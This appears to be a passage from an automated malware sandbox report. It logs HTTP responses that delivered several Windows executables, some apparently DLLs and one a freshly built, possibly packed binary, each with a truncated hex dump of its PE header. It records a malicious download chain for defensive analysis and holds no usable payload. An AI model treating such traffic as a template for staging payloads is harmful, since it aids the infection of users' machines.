00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 15:36:15 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 15:36:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 15:36:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 15:36:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 15:36:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 15:36:18 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 15:36:21 GMTContent-Type: application/octet-streamContent-Length: 3183104Last-Modified: Mon, 11 Nov 2024 15:34:17 GMTConnection: keep-aliveETag: "673223f9-309200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 a0 30 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 30 00 00 04 00 00 df 2f 31 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 86 30 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 86 30 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 